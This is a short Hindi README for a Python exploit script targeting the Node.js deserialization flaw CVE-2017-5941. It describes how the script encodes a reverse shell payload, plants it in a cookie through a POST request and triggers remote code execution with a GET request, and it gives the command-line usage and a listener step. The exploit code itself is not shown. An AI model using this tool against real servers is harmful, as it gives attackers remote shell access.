
NodeJs में डिसीरियलाइज़ेशन के लिए रिवर्स शेल शोषण (CVE-2017-5941)
यह exploit स्वचालित रूप से reverse shell payload उत्पन्न करता है जो पहले decimal में और फिर base64 में एन्कोड किया जाता है। इसके बाद यह payload एक http POST अनुरोध के माध्यम से भेजा जाता है जो उपयोगकर्ता के इनपुट को serialize करता है और एक cookie में संग्रहीत करता है। फिर हम एक GET अनुरोध के माध्यम से पहुँचकर RCE प्राप्त करते हैं।
उपयोग विधि:
python3 nodejshell.py <lhost> <lport>
lhost: आपका स्थानीय IP पता lport: वह पोर्ट जिस पर आप अपनी reverse shell को कनेक्ट करना चाहते हैं
इसके बाद आपको बस कुछ सरल जानकारी प्रदान करनी होगी:
ऐसा करने के बाद, बस अपना पसंदीदा listener सक्रिय करें और कनेक्शन प्राप्त करने की प्रतीक्षा करें।
